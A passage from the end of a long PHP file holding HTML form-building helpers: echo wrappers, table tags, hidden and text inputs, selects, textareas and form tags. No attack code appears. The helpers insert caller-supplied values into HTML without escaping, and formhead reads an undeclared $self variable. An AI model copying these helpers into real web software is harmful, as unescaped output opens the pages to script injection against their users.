2082 }
2083 function p($str) {
2084     echo $str . "\n";
2085 }
2086 function tbhead() {
2087     p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2088 }
2089 function tbfoot() {
2090     p('</table>');
2091 }
2092 function makehide($name, $value = '') {
2093     p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2094 }
2095 function makeinput($arg = array()) {
2096     $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2097     $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2098     !$arg['type'] && $arg['type'] = 'text';
2099     $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
2100     $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2101     if ($arg['newline']) {
2102         p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2103     } else {
2104         p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2105     }
2106 }
2107 function makeselect($arg = array()) {
2108     if ($arg['onchange']) {
2109         $onchange = 'onchange="' . $arg['onchange'] . '"';
2110     }
2111     $arg['title'] = $arg['title'] ? $arg['title'] : '';
2112     if ($arg['newline']) p('<p>');
2113     p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2114     if (is_array($arg['option'])) {
2115         foreach ($arg['option'] as $key => $value) {
2116             if ($arg['selected'] == $key) {
2117                 p("<option value=\"$key\" selected>$value</option>");
2118             } else {
2119                 p("<option value=\"$key\">$value</option>");
2120             }
2121         }
2122     }
2123     p("</select>");
2124     if ($arg['newline']) p('</p>');
2125 }
2126 function formhead($arg = array()) {
2127     !$arg['method'] && $arg['method'] = 'post';
2128     !$arg['action'] && $arg['action'] = $self;
2129     $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2130     !$arg['name'] && $arg['name'] = 'form1';
2131     p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2132     if ($arg['title']) {
2133         p('<h2>' . $arg['title'] . ' &raquo;</h2>');
2134     }
2135 }
2136 function maketext($arg = array()) {
2137     !$arg['cols'] && $arg['cols'] = 100;
2138     !$arg['rows'] && $arg['rows'] = 25;
2139     $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
2140     p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2141 }
2142 function formfooter($name = '') {
2143     !$name && $name = 'submit';
2144     p('<p><input class="bt" name="' . $name . '" id=\"' . $name . '\" type="submit" value="Submit"></p>');
2145     p('</form>');
2146 }
2147 function formfoot() {
2148     p('</form>');
2149 }
2150 // Exit
2151 function pr($a) {
2152     echo '<pre>';
2153     print_r($a);
2154     echo '</pre>';
2155 }
2156 ?>